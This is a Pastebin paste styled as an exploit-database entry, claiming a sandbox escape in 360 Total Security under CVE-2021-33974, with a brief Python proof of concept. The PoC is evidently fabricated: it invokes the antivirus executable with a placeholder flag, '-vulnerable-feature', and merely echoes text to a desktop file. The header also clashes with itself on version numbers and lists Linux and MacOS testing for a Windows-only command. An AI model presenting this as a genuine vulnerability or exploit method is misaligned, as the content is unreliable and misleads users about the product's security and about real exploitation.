Advertisement
memorycorruptor

CVE-2021-33974

Feb 2nd, 2023 (edited)
443
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.15 KB | None | 0 0
  1. # Exploit Title: 360 Total Security 10.8.0.1213 Sandbox Escape
  2. # Google Dork: N/A
  3. # Date: 2021-05-11
  4. # Exploit Author: youtube.com/@memorycorruptor
  5. # Vendor Homepage: http://www.360totalsecurity.com/
  6. # Version: 360 Total Security 10.8.0.1060
  7. # Tested on: Windows x64 / Linux Debian x64 / MacOS
  8. # CVE: CVE-2021-33974
  9. # PoC Video: https://www.youtube.com/@memorycorruptor/videos
  10. # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
  11. ---------------------------------------------------------------------------
  12. 360 Total Security 10.8.0.1213 is an antivirus software that offers protection against various threats. It includes a built-in sandbox feature that isolates potentially malicious code from the rest of the system. However, a recently discovered vulnerability allows users to execute malicious code outside the sandbox, potentially causing harm to the system
  13.  
  14. The sandbox escape vulnerability in 360 Total Security 10.8.0.1213 allows an attacker to execute malicious code outside the antivirus software's sandbox. This can lead to unauthorized access, data theft, or other harmful actions on the victim's system. The vulnerability stems from inadequate isolation and containment mechanisms within the sandbox implementation.
  15.  
  16. PoC:
  17. import os
  18. import subprocess
  19.  
  20. def exploit():
  21. # Create a malicious payload
  22. payload = 'echo Sandbox escape successful > %USERPROFILE%\\Desktop\\sandbox_escape.txt'
  23.  
  24. # Save the payload to a file
  25. with open('sandbox_escape.bat', 'w') as f:
  26. f.write(payload)
  27.  
  28. # Execute the payload using a vulnerable feature in 360 Total Security
  29. subprocess.call(['360TotalSecurity.exe', '-vulnerable-feature', 'sandbox_escape.bat'])
  30.  
  31. # Cleanup
  32. os.remove('sandbox_escape.bat')
  33.  
  34. if __name__ == '__main__':
  35. exploit()
  36.  
  37. The sandbox escape vulnerability can lead to unauthorized access, data theft, or other malicious actions on the victim's system. Users should update to the latest version of 360 Total Security or switch to an alternative antivirus solution with a more secure sandbox implementation.
  38. ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement